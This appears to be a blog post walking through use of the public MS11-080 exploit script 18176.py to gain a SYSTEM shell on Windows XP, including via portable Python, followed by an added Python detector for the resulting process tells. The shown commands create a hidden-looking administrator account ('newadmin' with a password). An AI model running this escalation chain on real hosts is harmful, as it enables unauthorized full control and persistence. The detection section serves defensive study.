So you’ve got access to a box, but only as a local user, and like most people you want SYSTEM: step in 18176.py. As this code is written in Python, you’ll need a local copy of Python on the box in order to priv up.

C:\Documents and Settings\user\Desktop>18176.py
Usage: 18176.py -O TARGET_OS
Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3
C:\Documents and Settings\user\Desktop>

My first attempt was with Python version 3.2.2 and the code kept failing: the script uses Python 2’s print statement, which Python 3 rejects as a syntax error.

C:\Documents and Settings\user\Desktop>18176.py
  File "C:\Documents and Settings\Administrator\Desktop\18176.py", line 56
    print "[+] Retrieving %s info..." % drvname
                                    ^
SyntaxError: invalid syntax
C:\Documents and Settings\user\Desktop>

Python version 2.7 seemed to work just fine 🙂

C:\Documents and Settings\user\Desktop>net user newadmin /add
System error 5 has occurred.
Access is denied.
C:\Documents and Settings\user\Desktop>18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>

And now for the quick new user 🙂

C:\WINDOWS\system32>net user newadmin Secret01 /add
The command completed successfully.
C:\WINDOWS\system32>net localgroup Administrators newadmin /add
The command completed successfully.
C:\WINDOWS\system32>net user
User accounts for \\
------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            newadmin                 SUPPORT_388945a0
user
The command completed with one or more errors.
C:\WINDOWS\system32>

I got thinking: I could attempt to rewrite this exploit in another language, but that’s way past my skill level and available time. So what about a portable version of Python? Step in PortablePython! The download is 45MB and once extracted it’s 222MB. Then it’s just a simple case of pointing its python.exe at the script 🙂

C:\Documents and Settings\user\Desktop>PortablePy\App\python.exe 18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>net user newuser Secret01 /add
The command completed successfully.
C:\WINDOWS\system32>
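From the defender’s side, the session above leaves three tells in process-creation telemetry: a Python interpreter started from a user-writable folder, a SYSTEM process whose parent ran as an ordinary user, and `net user … /add` / `net localgroup Administrators … /add` executed as SYSTEM. The toy detector below is an added example (not part of the original post or the exploit) that flags those tells; the event records are constructed and simplified, and the `BOX\user` account name and the field layout are assumptions.

```python
import re
from typing import Dict, List, Tuple

SYSTEM = r"NT AUTHORITY\SYSTEM"
# Python interpreter image of any version (python.exe, python27.exe, ...)
PY_INTERP = re.compile(r"\\python\d*\.exe$", re.I)
# Folders an unprivileged user can write to on an XP/2003-era build
USER_WRITABLE = re.compile(r"\\(Desktop|Temp|Downloads|My Documents)\\", re.I)
# 'net user NAME [PASSWORD] /add' and 'net localgroup administrators NAME /add'
ACCOUNT_CHANGE = re.compile(
    r"^net(?:\.exe)?\s+(?:user\s+\S+(?:\s+\S+)?|localgroup\s+administrators\s+\S+)\s+/add\b",
    re.I)

def findings(ev: Dict[str, str]) -> List[str]:
    """Return the reasons (possibly none) one process-creation event looks like the chain."""
    hits = []
    if PY_INTERP.search(ev["image"]) and USER_WRITABLE.search(ev["image"]):
        hits.append("interpreter launched from user-writable path")
    if ev["user"] == SYSTEM and ev["parent_user"] != SYSTEM:
        hits.append("SYSTEM process with non-SYSTEM parent")  # the priv-up itself
    if ev["user"] == SYSTEM and ACCOUNT_CHANGE.search(ev["cmdline"]):
        hits.append("account/group change executed as SYSTEM")
    return hits

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run findings() over an ordered event list; returns (event index, reason) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in findings(ev)]

# Constructed sample modelled on the session above (not real log data).
EVENTS = [
    {"user": "BOX\\user", "parent_user": "BOX\\user",
     "image": r"C:\WINDOWS\system32\notepad.exe", "cmdline": "notepad.exe"},
    {"user": "BOX\\user", "parent_user": "BOX\\user",
     "image": r"C:\Documents and Settings\user\Desktop\PortablePy\App\python.exe",
     "cmdline": "python.exe 18176.py -O XP"},
    {"user": SYSTEM, "parent_user": "BOX\\user",
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": "cmd.exe"},
    {"user": SYSTEM, "parent_user": SYSTEM,
     "image": r"C:\WINDOWS\system32\net.exe", "cmdline": "net user newadmin Secret01 /add"},
    {"user": SYSTEM, "parent_user": SYSTEM,
     "image": r"C:\WINDOWS\system32\net.exe",
     "cmdline": "net localgroup Administrators newadmin /add"},
    {"user": SYSTEM, "parent_user": SYSTEM,  # benign service child: no finding
     "image": r"C:\WINDOWS\system32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, reason in scan(EVENTS):
        print(f"event {idx}: {reason}")
```

The parent-account rule is deliberately coarse; on a real host, service-manager children and scheduled tasks need an allow-list so that only genuine user-to-SYSTEM jumps are reported.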

It would be nice to see how much I could strip out of the portable version in order to decrease its size, but that’s something else for a rainy day.

How long before this is written in powershell or added to meterpreter’s getsystem code?
